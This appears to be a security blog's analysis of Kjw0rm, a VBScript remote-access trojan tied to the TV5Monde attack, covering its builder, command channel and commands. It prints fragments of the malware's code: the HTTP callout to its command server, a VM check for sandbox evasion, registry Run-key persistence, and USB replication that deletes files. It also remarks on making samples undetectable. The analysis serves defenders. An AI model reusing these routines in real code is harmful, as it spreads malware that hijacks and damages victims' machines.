Understanding “Kjw0rm” Malware – We Dive in to the TV5 Cyber Attack

Pro-Islamic state hackers conducted an attack against “TV5Monde” TV station in France, news sources report that the Islamic hacktivist were apparently unhappy about the TV station that covered the recent events in Paris.




TV5Monde’s “defaced” twitter account.

Sources report that the attack chain was a social engineering phishing via social networks that was followed by exploitation of java components to perform a drive-by-download, which later led to the execution of “Kjw0rm” malware.

“Kjw0rm” is a malware that was first seen in the wild around January 2014.

It has many variations, the older parent version is named “Njw0rm”, Both of the malwares and all the other variations belong to the same family, which shares a lot of functionality and similarity in their working flow.

Kjw0rm’s main window, infected hosts detailed view and control.

The builder options and the implementation inside the generated sample :




The attacker can configure the IP of the C&C, the listening port, the directory to install the malware and the name of the victims, which will be stored after a successful execution on the victim machine.




 To play with the sample generated by the Kjw0rm builder, we should patch the environment or remove the “vmcheck” inside the sample of .vbs file.

Simple technique to avoid automatic analysis if the environment is not properly set (Like online sandboxes).

The communication channel​-


“Set o = CreateObject(“MSXML2.XMLHTTP”) o.open “POST”,”http://” & host & “:” & port &”/” & cmd, false o.setRequestHeader “User-Agent:”, inf o.send da post=o.responseText”

Extracted Info reported to C&C :


Using WMI


“Set a = GetObject(“winmgmts:{impersonationLevel=impersonate}!.rootcimv2″)

Set aa = a.ExecQuery(“SELECT * FROM Win32_LogicalDisk”)

For Each aaa In aa if aaa.VolumeSerialNumber<>””

then HWD= “KJw0rm_” & aaa.VolumeSerialNumber”


VM Check


“function vmcheck()

On Error Resume Next

Set WMI = GetObject(“WinMgmts:”)

Set Col = WMI.ExecQuery(“Select * from Win32_ComputerSystemProduct”)

For Each Ob in Col

if instr( lcase( ob.name),”virtual”) >0 then

On Error Resume Next f



Infected host traffic query for commands and reporting alive status.

The malware passes the basic info about the infected host via the “user-agent” header.

We can also notice the “UA-CPU” header.

The malware has three cases to decide its next operation, controlled by the attacker(admin).

● 0 (do nothing)

● excKsks(download and execute)

● uns(Uninstall and terminate)





Some of its obfuscation (related to being detected by AVs), the builder automatically generate a sample with obfuscated operations, since those techniques or related strings are already detected when in clear-text.

.VBS packers/obfuscators are not new in the market, some developers already implement such techniques inside their builders, but in case of detection the attacker can easily purchase a new packer to clear the detection rate by the AV industry.




Detected by 8/57 AV with known .VBS crypter, little patching was needed for FUD sample.

This sample is actually uploaded today by us, as you see only a few solutions were able to detect it. Of course if we wanted to make it undetectable completely, we could obfuscate some functions in the VBS file etc, the possibilities are endless in this case.


Offensive Part


“POST /ready HTTP/1.1

Accept: */*

Accept-Language: en-us

User-Agent:Jw0rm_4CC893CUSER-PCuserWin7 Ultimate SP1



Accept-Encoding: gzip, deflate


Content-Length: 0

Connection: Keep-Alive

Cache-Control: no-cache”

Kjw0rm and other variants were built with an insecure management application, the developers didn’t implement authentication or any other enforcement between the malware and it’s C&C, allowing the ability to exploit the server by manipulating the data sent, for example to cause denial-of-service condition to shutdown active panel.


Most of the simple malware have many vulnerabilities within their management, and simple penetration testing techniques can also apply there in order to gain access to the “attackers side”.




The malware uses the following reg keys to stay in the system:

sh.regwrite “HKCUSoftwareMicrosoftWindowsCurrentVersionRun” & fn, chrw(34) & dr & fn &

chrw(34), “REG_SZ”

sh.regwrite “HKLMSoftwareMicrosoftWindowsCurrentVersionRun” & fn, chrw(34) & dr & fn &

chrw(34), “REG_SZ”


sh.regread(“HKEY_LOCAL_MACHINESOFTWAREClasses.” & Split(x.name, “.”)(UBound(Split(x.name, “.”)))

& “”) & “DefaultIcon”)

Some of its spreading/replication code:

for each xx in fs.Drives

if xx.isready then

if xx.FreeSpace >0 then

if xx.drivetype=1 then

if fs.fileexists(xx.path & “” & fn) then

fs.getfile(xx.path & “” & fn).Attributes=0

end if

fs.copyfile dr & fn , xx.path & “” & fn,true

For Each x In fs.GetFolder( xx.path & “”).Files

On Error Resume Next

if instr(x.name,”.”) then

if lcase( Split(x.name, “.”)(UBound(Split(x.name, “.”))))<>”lnk” then

x.Attributes = 0

if ucase(x.name) <> ucase(fn) then

fs.deletefile(xx.path & “” & x.name & “.lnk” )


fs.deletefile( xx.path & “” & x.name )

Kjw0rm is a RAT with basic management application GUI, that provides the attacker the ability to control infected hosts and view details about their machine, generate .vbs samples with preconfigured options.

Since it’s easy to avoid AVs with simple logic, malwares more and more base their code on VBScript language and there are many samples to learn from implementing VM checks, sleeps, packing techniques, WMI commands to extract information from the victim. Serving as a simple channel between the attacker and the victim and allowing the attacker to execute remote code at any time without interference.

We are aware of other variants with similar capabilities, since this malware family is based on readable code, shared and sold, allowing criminals to implement their desired features and craft new variants without too much difficulties.